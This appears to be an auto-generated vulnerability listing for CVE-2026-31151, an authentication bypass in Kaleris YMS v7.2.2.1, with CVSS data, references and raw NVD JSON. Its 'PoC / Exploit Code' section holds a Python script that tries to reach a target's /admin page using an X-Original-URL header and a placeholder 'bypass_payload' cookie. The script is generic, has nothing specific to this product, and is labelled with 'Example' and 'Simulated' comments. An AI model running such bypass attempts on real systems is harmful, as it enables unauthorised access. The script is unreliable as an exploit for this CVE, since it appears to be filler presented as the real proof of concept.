CVE-2026-31151

Description

An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application 's resources.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kaleris:yard_management_solutions:7.2.2.1:*:*:*:*:*:*:* - VULNERABLE

Kaleris YMS v7.2.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
target_url = "http://target-ip:port/admin"

# Vulnerability: Authentication Bypass
# Often involves manipulating headers or cookies to simulate an authenticated session
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "X-Original-URL": "/admin", # Common bypass technique
    "Cookie": "auth_token=bypass_payload" # Simulated payload
}

try:
    # Send request to protected resource without valid credentials
    response = requests.get(target_url, headers=headers, timeout=10)
    
    # Check if login was bypassed (Status 200 and specific content)
    if response.status_code == 200 and "Dashboard" in response.text:
        print("[+] Exploit Successful! Authentication bypassed.")
        print(f"[+] Content Length: {len(response.text)}")
    else:
        print("[-] Exploit Failed or Patched.")
        print(f"Status Code: {response.status_code}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31151
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31151
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31151/
[4] VulDB https://vuldb.com/cve/CVE-2026-31151
[5] https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151
[6] https://kaleris.com/solutions/yard-management/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31151", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:09.553", "lastModified": "2026-04-10T18:02:47.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application 's resources."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kaleris:yard_management_solutions:7.2.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "4981C1C6-A8B8-44C1-AB1C-132E7EE48677"}]}]}], "references": [{"url": "https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://kaleris.com/solutions/yard-management/", "source": "[email protected]", "tags": ["Product"]}]}}